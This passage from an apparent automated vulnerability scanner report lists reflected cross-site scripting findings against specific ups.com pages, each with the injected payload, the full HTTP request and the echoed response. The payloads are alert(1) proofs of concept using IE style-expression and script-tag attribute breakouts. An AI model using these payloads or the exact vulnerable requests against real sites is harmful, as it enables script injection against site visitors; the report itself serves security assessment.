User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:54 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us2f8ea"style="x:expression(alert(1))"c56152e9033/en/shipping/index.html">
...[SNIP]...

1.381. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ab7"style%3d"x%3aexpression(alert(1))"0664130560d was submitted in the REST URL parameter 3. This input was echoed as 17ab7"style="x:expression(alert(1))"0664130560d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en17ab7"style%3d"x%3aexpression(alert(1))"0664130560d/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en17ab7"style="x:expression(alert(1))"0664130560d/shipping/index.html">
...[SNIP]...

1.382. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f was submitted in the REST URL parameter 2. This input was echoed as d4ac1"style="x:expression(alert(1))"17b4988c95f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usd4ac1"style%3d"x%3aexpression(alert(1))"17b4988c95f/en/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usd4ac1"style="x:expression(alert(1))"17b4988c95f/en/shipping/time/service/index.html">
...[SNIP]...

1.383. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/time/service/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20 was submitted in the REST URL parameter 3. This input was echoed as 7b24d"style="x:expression(alert(1))"686e1186d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en7b24d"style%3d"x%3aexpression(alert(1))"686e1186d20/shipping/time/service/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:56 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en7b24d"style="x:expression(alert(1))"686e1186d20/shipping/time/service/index.html">
...[SNIP]...

1.384. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71 was submitted in the REST URL parameter 2. This input was echoed as 27baa"style="x:expression(alert(1))"2e2ebd57b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us27baa"style%3d"x%3aexpression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54858

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us27baa"style="x:expression(alert(1))"2e2ebd57b71/en/shipping/time/service/shipping/index.html">
...[SNIP]...

1.385. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/shipping/time/service/shipping/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7 was submitted in the REST URL parameter 3. This input was echoed as eb749"style="x:expression(alert(1))"2d88e2596e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/eneb749"style%3d"x%3aexpression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/eneb749"style="x:expression(alert(1))"2d88e2596e7/shipping/time/service/shipping/index.html">
...[SNIP]...

1.386. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61 was submitted in the REST URL parameter 2. This input was echoed as ff296"style="x:expression(alert(1))"5ef14c9e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usff296"style%3d"x%3aexpression(alert(1))"5ef14c9e61/en/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usff296"style="x:expression(alert(1))"5ef14c9e61/en/siteguide/index.html">
...[SNIP]...

1.387. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17 was submitted in the REST URL parameter 3. This input was echoed as acee2"style="x:expression(alert(1))"ddaee83ec17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enacee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enacee2"style="x:expression(alert(1))"ddaee83ec17/siteguide/index.html">
...[SNIP]...

1.388. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05 was submitted in the REST URL parameter 2. This input was echoed as c574d"style="x:expression(alert(1))"6d4bfc86b05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45580

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc574d"style="x:expression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html">
...[SNIP]...

1.389. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e was submitted in the REST URL parameter 3. This input was echoed as 743d0"style="x:expression(alert(1))"109bef8a77e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en743d0"style="x:expression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1">
...[SNIP]...

1.390. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13 was submitted in the REST URL parameter 2. This input was echoed as edee3"style="x:expression(alert(1))"fe6f25a0e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usedee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usedee3"style="x:expression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html">
...[SNIP]...

1.391. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a378c"style%3d"x%3aexpression(alert(1))"1991f7ee758 was submitted in the REST URL parameter 3. This input was echoed as a378c"style="x:expression(alert(1))"1991f7ee758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena378c"style%3d"x%3aexpression(alert(1))"1991f7ee758/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena378c"style="x:expression(alert(1))"1991f7ee758/tracking/quantumview/index.html">
...[SNIP]...

1.392. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee59f"style%3d"x%3aexpression(alert(1))"0706a145c41 was submitted in the REST URL parameter 2. This input was echoed as ee59f"style="x:expression(alert(1))"0706a145c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usee59f"style%3d"x%3aexpression(alert(1))"0706a145c41/en/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36647

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usee59f"style="x:expression(alert(1))"0706a145c41/en/tracking/tools/index.html">
...[SNIP]...

1.393. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5067b"style%3d"x%3aexpression(alert(1))"35b30889967 was submitted in the REST URL parameter 3. This input was echoed as 5067b"style="x:expression(alert(1))"35b30889967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en5067b"style%3d"x%3aexpression(alert(1))"35b30889967/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en5067b"style="x:expression(alert(1))"35b30889967/tracking/tools/index.html">
...[SNIP]...

1.394. http://www.ups.com/dropoff [WT.svl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/dropoff

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae02b"><script>alert(1)</script>38862b532a9 was submitted in the WT.svl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=en_US&WT.svl=ae02b"><script>alert(1)</script>38862b532a9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=ae02b"><script>alert(1)</script>38862b532a9&loc=en_US" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.395. http://www.ups.com/dropoff [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee95c"><script>alert(1)</script>d2cceec571c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=ee95c"><script>alert(1)</script>d2cceec571c&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=PriNav&loc=ee95c"><script>alert(1)</script>d2cceec571c" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.396. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/dropoff

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d2"><script>alert(1)</script>ec5ea0bf3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.397. https://www.ups.com/account/am/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 129ef%0a3d98201dc8b was submitted in the REST URL parameter 2. This input was echoed as 129ef
3d98201dc8b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

